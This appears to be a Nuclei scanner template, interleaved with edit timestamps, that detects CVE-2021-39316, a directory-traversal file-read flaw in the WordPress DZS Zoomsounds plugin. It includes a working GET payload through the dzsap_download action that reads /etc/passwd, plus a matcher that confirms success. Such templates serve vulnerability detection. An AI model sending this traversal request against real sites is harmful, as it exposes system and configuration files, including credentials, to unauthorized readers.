2022-02-28 20:45:19 +00:00
id : CVE-2021-39316
info :
2022-06-30 17:45:57 +00:00
name : WordPress DZS Zoomsounds <=6.50 - Local File Inclusion
2022-02-28 20:45:19 +00:00
author : daffainfo
severity : high
2022-06-30 17:45:57 +00:00
description : WordPress Zoomsounds plugin 6.45 and earlier allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the `dzsap_download` action using directory traversal in the `link` parameter.
2022-02-28 20:45:19 +00:00
reference :
- https://wpscan.com/vulnerability/d2d60cf7-e4d3-42b6-8dfe-7809f87547bd
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39316
2022-05-17 09:18:12 +00:00
- https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39316
- http://packetstormsecurity.com/files/165146/WordPress-DZS-Zoomsounds-6.45-Arbitrary-File-Read.html
2022-06-30 14:56:03 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-39316
2022-02-28 20:45:19 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2022-02-28 20:45:19 +00:00
cve-id : CVE-2021-39316
cwe-id : CWE-22
2022-08-27 04:41:18 +00:00
tags : wordpress,wp-plugin,zoomsounds,wpscan,packetstorm,cve,wp,cve2021,lfi
2022-02-28 20:45:19 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd"
matchers-condition : and
matchers :
- type : regex
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2022-02-28 20:45:19 +00:00
- type : status
status :
2022-05-13 20:26:43 +00:00
- 200
2022-06-30 14:56:03 +00:00
# Enhanced by mp on 2022/06/30